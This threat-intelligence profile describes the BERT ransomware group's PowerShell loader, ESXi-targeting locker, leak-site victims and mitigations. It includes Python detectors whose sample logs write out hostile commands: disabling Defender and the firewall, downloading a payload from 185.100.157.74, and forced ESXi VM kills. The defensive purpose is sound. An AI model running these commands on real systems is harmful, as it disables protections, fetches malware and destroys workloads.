Threat Actor Profile: BERT Ransomware Group

Overview

The BERT ransomware group, also tracked under the alias “Water Pombero”, is a financially motivated threat actor that has been active since at least early 2025. Since its emergence, BERT has been observed conducting ransomware operations across Asia, Europe, and North America, with confirmed targeting activity in countries including Brazil, the United Kingdom, Malaysia, Turkey, Taiwan, and the United States.

[Figure: Regions and industries targeted by the BERT ransomware group (Source: Cyble Vision)]

Unlike many ransomware groups that rely on highly bespoke malware ecosystems, BERT demonstrates a hybrid operational model combining simple but optimized ransomware binaries with a powerful PowerShell-based intrusion chain. This combination allows the group to maintain both speed and operational flexibility while minimizing development overhead. 

Initial Access and Intrusion Chain

BERT’s intrusion chain frequently begins with a PowerShell-based loader named start.ps1. This script acts as the primary execution mechanism during compromise and is responsible for multiple pre-encryption actions. 

Once executed, likely via spearphishing attachments (T1566.001) or malicious downloads, the loader performs a sequence of system-level modifications. These include: 

  • Disabling Microsoft Defender and firewall protections  
  • Attempting User Account Control (UAC) bypass (T1548.002)  
  • Modifying registry settings to weaken system security  
  • Escalating privileges before payload execution  

After this preparation, the script retrieves the ransomware payload over HTTP/HTTPS from a Russian-registered IP address, 185.100.157.74.

This reliance on a centralized download location and PowerShell execution highlights a streamlined but effective initial access model centered on living-off-the-land binaries (LOLBins) and script-based execution rather than complex exploit chains. 
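As an added example (not code from the Cyble profile or from BERT's tooling), the following triage routine runs over PowerShell script block log text (Event ID 4104, the logging the recommendations later advise enabling) and maps the loader behaviours described above to the ATT&CK techniques this profile lists. The sample records and the regexes are constructed assumptions about how such actions appear in script text; only the IP address comes from the profile.

```python
import re

# Constructed PowerShell script block records (Event ID 4104 text), not real
# BERT samples. rec-2 imitates the chain the profile describes; the others are benign.
SCRIPT_BLOCKS = {
    "rec-1": "Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\\temp\\svc.csv",
    "rec-2": (
        "Set-MpPreference -DisableRealtimeMonitoring $true\n"
        "netsh advfirewall set allprofiles state off\n"
        "Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Policies\\Example' -Name Enabled -Value 0\n"
        "Invoke-WebRequest -Uri http://185.100.157.74/payload.exe -OutFile $env:TEMP\\p.exe\n"
    ),
    "rec-3": "Set-ItemProperty -Path 'HKCU:\\Software\\App' -Name Theme -Value dark",
}

# Behaviours the profile attributes to start.ps1, keyed by ATT&CK technique.
# The patterns are an assumption of how those actions commonly surface in script text.
INDICATORS = {
    "T1562.001": re.compile(r"Set-MpPreference\s+-Disable\w+|netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I),
    "T1112": re.compile(r"\b(Set-ItemProperty|New-ItemProperty|reg\s+add)\b.*\bHK(LM|CU)\b", re.I),
    "T1071.001": re.compile(r"(Invoke-WebRequest|iwr|DownloadString|DownloadFile|Start-BitsTransfer).*https?://\d{1,3}(\.\d{1,3}){3}", re.I),
    "T1027": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}|FromBase64String", re.I),
}
KNOWN_PAYLOAD_HOST = "185.100.157.74"  # payload host reported in this profile


def triage(record_id, text):
    """Score one script block. A single technique alone is 'low' (admins modify the
    registry too); chaining two or more, or contacting the reported host, is 'high'."""
    hits = sorted(t for t, rx in INDICATORS.items() if rx.search(text))
    known_host = KNOWN_PAYLOAD_HOST in text
    if known_host or len(hits) >= 2:
        severity = "high"
    elif hits:
        severity = "low"
    else:
        severity = "none"
    return {"record": record_id, "severity": severity, "techniques": hits, "known_host": known_host}


def triage_all(blocks):
    """Triage every record in a {record_id: script_text} mapping, in log order."""
    return [triage(rid, txt) for rid, txt in blocks.items()]


if __name__ == "__main__":
    for finding in triage_all(SCRIPT_BLOCKS):
        print(finding)
```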

Ransomware Architecture and Technical Behavior 

Windows Variants 

On Windows systems, BERT ransomware uses relatively compact compiled codebases, often .NET-based, with a focus on efficiency rather than complexity. The encryption routine commonly relies on AES, while some variants also incorporate Salsa20, ChaCha, or RC4, depending on the build version. 

Key behavioral characteristics include: 

  • Process termination based on predefined string matches  
  • File system scanning using either:  
      • Single-threaded enumeration (older variants), or  
      • Multi-threaded concurrent queues with per-drive workers (newer variants)  
  • Immediate encryption execution without full pre-listing of file paths in newer builds  

This evolution from sequential scanning to parallelized encryption workflows significantly increases execution speed and shortens the window in which defenders can respond. 

Encrypted files are renamed using distinctive extensions such as: 

  • .encryptedbybert  
  • .encryptedbybert3  
  • .hellofrombert  

These extensions serve both operational and psychological purposes, reinforcing attribution and signaling successful compromise. 

Linux and ESXi Targeting 

BERT also maintains a Linux-compatible ransomware variant, which is particularly notable for its focus on virtualization infrastructure. The Linux version is designed for high-concurrency execution (up to 50 threads), allowing rapid encryption across large file systems. 

A defining feature of this variant is its ability to target VMware ESXi environments, where it attempts to terminate virtual machines using commands such as: 

esxcli vm process kill --type=force 

This behavior indicates a deliberate attempt to destroy recovery points before encryption completes, ensuring maximum disruption. 
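As an added example (not code from the Cyble profile or from the BERT locker), here is a detection routine for the forced VM termination described above, run over ESXi shell history. The log lines are constructed in the shape assumed for ESXi's /var/log/shell.log, and it distinguishes a single forced kill, which an administrator may issue against a hung VM, from a burst of forced kills, which is the pattern a locker produces before encrypting the datastore.

```python
import re
from datetime import datetime, timedelta

# Constructed shell.log lines, not from a real incident. The morning entries show an
# admin gracefully stopping one VM; the evening burst mimics pre-encryption VM teardown.
SHELL_LOG = """\
2025-05-22T09:10:41Z shell[20011]: [root]: esxcli vm process list
2025-05-22T09:10:55Z shell[20011]: [root]: esxcli vm process kill --type=soft --world-id=21001
2025-05-22T22:03:01Z shell[31337]: [root]: esxcli vm process list
2025-05-22T22:03:04Z shell[31337]: [root]: esxcli vm process kill --type=force --world-id=21002
2025-05-22T22:03:05Z shell[31337]: [root]: esxcli vm process kill --type=force --world-id=21003
2025-05-22T22:03:05Z shell[31337]: [root]: esxcli vm process kill --type=force --world-id=21004
2025-05-22T22:03:06Z shell[31337]: [root]: esxcli vm process kill -t force -w 21005
"""

# Assumed line shape: "<ISO timestamp> shell[<pid>]: [<user>]: <command>"
LINE_RX = re.compile(r"^(?P<ts>\S+)\s+shell\[(?P<pid>\d+)\]:\s+\[(?P<user>[^\]]+)\]:\s+(?P<cmd>.*)$")
# Forced kill in either long (--type=force / --type force) or short (-t force) form
FORCE_KILL_RX = re.compile(r"esxcli\s+vm\s+process\s+kill\b.*(--type[= ]force|-t\s+force)")


def forced_kills(log_text):
    """Return (timestamp, user, command) for every forced VM termination, log order."""
    found = []
    for line in log_text.splitlines():
        m = LINE_RX.match(line)
        if not m or not FORCE_KILL_RX.search(m["cmd"]):
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        found.append((ts, m["user"], m["cmd"]))
    return found


def kill_bursts(log_text, threshold=3, window=timedelta(seconds=60)):
    """Group forced kills that fall within `window` of the group's first kill and
    return (first_timestamp, count) for groups of at least `threshold` kills."""
    groups = []
    for ts, _user, _cmd in sorted(forced_kills(log_text)):
        if groups and ts - groups[-1][0] <= window:
            groups[-1][1] += 1
        else:
            groups.append([ts, 1])
    return [(ts, n) for ts, n in groups if n >= threshold]


if __name__ == "__main__":
    for first_ts, count in kill_bursts(SHELL_LOG):
        print(f"ALERT: {count} forced VM kills starting {first_ts.isoformat()}Z")
```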

Additionally, evidence suggests that BERT may have borrowed or repurposed components from the REvil ransomware ecosystem, particularly its Linux-based ESXi locker functionality. This is inferred from observed code similarities rather than confirmed attribution. 

Data Leak and Extortion Infrastructure 

BERT operates a dark web data leak site (DLS) where it publishes victim information. Unlike many ransomware-as-a-service (RaaS) groups, BERT does not rely on a structured negotiation portal. Instead, communications with victims occur through privacy-focused messaging channels, with ransom payments requested exclusively in Bitcoin (BTC). 

The DLS typically lists victims along with: 

  • Organization URL  
  • Reported revenue figures  
  • Attack or breach dates  

This structured exposure of financial and operational data suggests an intent to increase extortion pressure by highlighting victim value and breach timelines. 

Known Victimology and Campaign Activity 

Throughout 2025, BERT has claimed responsibility for multiple high-impact intrusions. 

On 22 May 2025, the group allegedly targeted a Malaysia-based construction and infrastructure organization. BERT claimed it exfiltrated approximately 5TB of data, releasing a 65.3GB archive as proof. The leaked materials reportedly included financial records and internal documentation. 

[Figure: BERT claiming a data breach at a Malaysia-based construction firm (Source: Cyble Vision)]

Another notable case involved a Taiwan-based manufacturer specializing in semiconductor and automation technologies. BERT claimed to have stolen over 5TB of data, publishing a 64.3GB sample archive containing engineering blueprints, client orders, financial data, and internal project files. 

[Figure: BERT claiming a breach at a Taiwan-based semiconductor manufacturer (Source: Cyble Vision)]

The organization reportedly disclosed a cyber incident to the Taiwan Stock Exchange on 20 April 2025, stating that its systems were compromised and some machines were infected, though it initially claimed no confirmed data leakage or operational disruption. 

On 4 April 2025, BERT launched a dedicated leak entry targeting a U.S.-based ticketing services provider. The group published 22.9GB of stolen data, including: 

  • Financial records  
  • A customer database containing 8,460 entries with names and email addresses  
  • An order log with 468 entries, including billing information  

[Figure: The BERT ransomware group's leak-site listing of a U.S.-based ticketing provider (Source: Cyble Vision)]

BERT claimed the breach occurred approximately two months before disclosure and asserted that the victim refused to engage in negotiation. 

Tooling and Malware Ecosystem 

[Figure: Malware families and tools used by BERT (Source: Cyble Vision)]

Across observed campaigns, BERT relies heavily on a single dominant tool: a PowerShell-based Remote Access Trojan (RAT). This RAT functions as both a reconnaissance and control mechanism, enabling: 

  • Remote command execution  
  • Registry modification  
  • File upload/download  
  • Process manipulation  
  • System information collection  
  • ZIP archive handling  
  • Script execution from remote servers  

Conclusion 

BERT (Water Pombero) is an active ransomware group that uses PowerShell-based loaders, fast multi-threaded encryption, and ESXi-targeting Linux variants to rapidly disrupt and encrypt systems while exfiltrating large volumes of data across global targets. Its focus on speed, virtualization abuse, and script-based intrusion makes it a persistent risk to hybrid enterprise environments.  


Organizations can reduce exposure by adopting intelligence-led detection and automated response capabilities; Cyble provides real-time threat intelligence and AI-driven defense through Cyble Blaze to help identify and block ransomware activity early, and teams can book a personalized demo to explore proactive protection against actors like BERT. 

Recommendations and Mitigation Strategies 

  • Harden Email Security Controls: Deploy advanced phishing detection, attachment sandboxing, and URL filtering to prevent delivery of malicious PowerShell loaders such as start.ps1 used for initial access.  
  • Restrict PowerShell Usage: Enforce constrained language mode, enable script block logging, and limit PowerShell execution to signed scripts to reduce abuse of PowerShell-based loaders and RAT activity.  
  • Implement Multi-Factor Authentication (MFA): Require MFA across all critical systems, especially for remote access, administrative accounts, and VPNs to mitigate credential abuse and lateral movement.  
  • Secure and Monitor ESXi Environments: Disable unnecessary SSH access, patch ESXi vulnerabilities, and monitor for suspicious commands (e.g., forced VM termination via esxcli) to prevent disruption of virtual infrastructure.  
  • Apply Network Segmentation: Isolate critical systems, backups, and virtualization infrastructure to limit the spread of ransomware and reduce blast radius during compromise.  
  • Deploy Endpoint Detection and Response (EDR): Use EDR/XDR solutions to detect behaviors such as process termination, registry modification, defense disabling, and high-speed encryption activity.  
  • Maintain Offline and Immutable Backups: Regularly back up critical data and ensure backups are stored offline or in immutable storage to prevent tampering or deletion during attacks.  
  • Monitor Outbound Traffic and Block Malicious IPs: Inspect network traffic for suspicious outbound connections, including communication with known malicious infrastructure such as hardcoded IPs used for payload retrieval.  
  • Enforce Least Privilege Access: Limit administrative privileges and regularly audit account permissions to reduce the impact of privilege escalation and unauthorized system changes.  
  • Conduct Security Awareness Training: Educate users on phishing, malicious attachments, and social engineering tactics to reduce the likelihood of initial compromise through user interaction. 

MITRE ATT&CK Techniques Associated with BERT Ransomware Group 

[Figure: MITRE ATT&CK techniques associated with BERT (Source: Cyble Vision)]

  • Spearphishing Attachment (T1566.001 | Initial Access): Delivered malicious email attachments containing the PowerShell loader to initiate compromise.  
  • PowerShell (T1059.001 | Execution): Executed the start.ps1 loader to disable security controls, modify the registry, and download the ransomware payload from a hardcoded IP.  
  • User Execution (T1204.002 | Execution): Relied on user interaction to run malicious PowerShell scripts or disguised dropper binaries embedded in phishing emails or fake software.  
  • Registry Run Keys / Startup Folder (T1547.001 | Persistence): Likely maintained persistence by modifying registry keys or startup folders using PowerShell or .NET binaries.  
  • Bypass User Account Control (T1548.002 | Privilege Escalation): Leveraged UAC bypass techniques within the loader to gain elevated privileges before deploying ransomware.  
  • Obfuscated Files or Information (T1027 | Defense Evasion): Used Base64 encoding and other obfuscation methods in scripts and binaries to evade detection. 
  • Masquerading (T1036 | Defense Evasion): Disguised ransomware binaries with misleading names and future-dated timestamps (e.g., 2047, 2076) to hinder analysis.  
  • Modify Registry (T1112 | Defense Evasion): Altered registry settings to weaken system defenses and avoid detection.  
  • Disable or Modify Tools (T1562.001 | Defense Evasion): Disabled Windows Defender, firewall, and other endpoint protection mechanisms during execution.  
  • System Information Discovery (T1082 | Discovery): Collected system details to tailor execution, such as avoiding specific directories or duplicate encryption.  
  • File and Directory Discovery (T1083 | Discovery): Scanned directories to identify files for encryption or exfiltration.  
  • SMB/Windows Admin Shares (T1021.002 | Lateral Movement): Attempted to spread across the network using shared drives and administrative shares.  
  • Automated Collection (T1119 | Collection): Crawled file systems to gather data for encryption and potential exfiltration in double-extortion scenarios.  
  • Exfiltration Over C2 Channel (T1041 | Exfiltration): Transferred stolen data over command-and-control channels, likely via HTTPS.  
  • Web Protocols (T1071.001 | Command and Control): Communicated with external infrastructure (e.g., 185.100.157.74) over HTTP/HTTPS to retrieve payloads. 
  • Non-Application Layer Protocol (T1095 | Command and Control): Used alternative communication channels for data transfer or secondary C2 activity.  
  • Data Encrypted for Impact (T1486 | Impact): Encrypted files using AES, Salsa20, ChaCha, or RC4, appending extensions like .encryptedbybert or .hellofrombert.  
  • Service Stop (T1489 | Impact): Terminated ESXi virtual machines and related processes on Linux systems to maximize disruption before encryption.  
  • Inhibit System Recovery (T1490 | Impact): Likely deleted shadow copies and restore points to prevent recovery.  
  • Resource Hijacking (T1496 | Impact): Utilized high system resources with 50+ concurrent threads on Linux to accelerate encryption. 